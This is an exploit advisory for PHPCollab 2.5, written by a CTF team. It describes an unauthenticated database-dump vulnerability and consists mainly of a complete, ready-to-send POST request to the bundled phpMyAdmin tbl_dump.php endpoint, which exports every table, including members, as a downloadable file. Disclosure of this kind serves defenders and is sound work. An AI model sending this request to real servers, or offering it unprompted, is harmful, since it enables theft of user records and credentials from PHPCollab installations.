PHPCollab version 2.5 suffers from an unauthenticated database backup download vulnerability.
9a46856d1ef2f65839de2f080ba3af5ea42fd6478ae04438b9ce383fffe5a549
# Exploit Title: phpcollab Unauthenticated Database Backup Download
# Date: 3/5/2012
# Author: team ' and 1=1--
# Software Link: http://www.phpcollab.com/
# Version: 2.5
# Vulnerability was found during the AthCon IT Security Conference CTF
#CTF organizer: echothrust
During AthCon CTF the team ' and 1=1-- identified that a potential
attacker is able to
download the database backup of the phpcollab instance that is installed
under the following URL: http://xxx.xxx.xxx.xxx/phpcollab/
The Vulnerability can be exploited by sending the following POST Request:
http://xxx.xxx.xxx.xxx/phpcollab/includes/phpmyadmin/tbl_dump.php
POST DATA:
table_select%5B%5D=assignments&table_select%5B%5D=bookmarks&table_select%5B
%5D=bookmarks_categories&table_select%5B%5D=calendar&table_select%5B%5D=fil
es&table_select%5B%5D=invoices&table_select%5B%5D=invoices_items&table_sele
ct%5B%5D=logs&table_select%5B%5D=members&table_select%5B%5D=newsdeskcomment
s&table_select%5B%5D=newsdeskposts&table_select%5B%5D=notes&table_select%5B
%5D=notifications&table_select%5B%5D=organizations&table_select%5B%5D=phase
s&table_select%5B%5D=posts&table_select%5B%5D=projects&table_select%5B%5D=r
eports&table_select%5B%5D=services&table_select%5B%5D=sorting&table_select%
5B%5D=subtasks&table_select%5B%5D=support_posts&table_select%5B%5D=support_
requests&table_select%5B%5D=tasks&table_select%5B%5D=teams&table_select%5B%
5D=topics&table_select%5B%5D=updates&what=data&drop=1&asfile=sendit&server=
1&lang=en&db=phpcollab